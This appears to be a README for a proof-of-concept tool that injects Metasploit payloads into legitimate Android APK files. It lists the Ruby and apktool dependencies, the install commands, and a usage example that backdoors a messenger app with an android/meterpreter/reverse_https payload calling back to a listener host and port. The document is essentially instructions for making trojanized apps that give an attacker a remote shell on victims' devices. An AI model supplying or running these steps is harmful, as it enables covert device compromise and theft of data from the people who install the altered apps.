Embed a Metasploit Payload in an Original .Apk File
I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.
This script is a POC for injecting metasploit payloads on arbitrary APKs
Authored by timwr, Jack64 , developed by xC0d3rZ
gem install bundler
bundler install
- Ruby (>= 1.8.7).
- apktool.jar (>= 2.x).
./run [target.apk] [msfvenom options]
e.g
./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443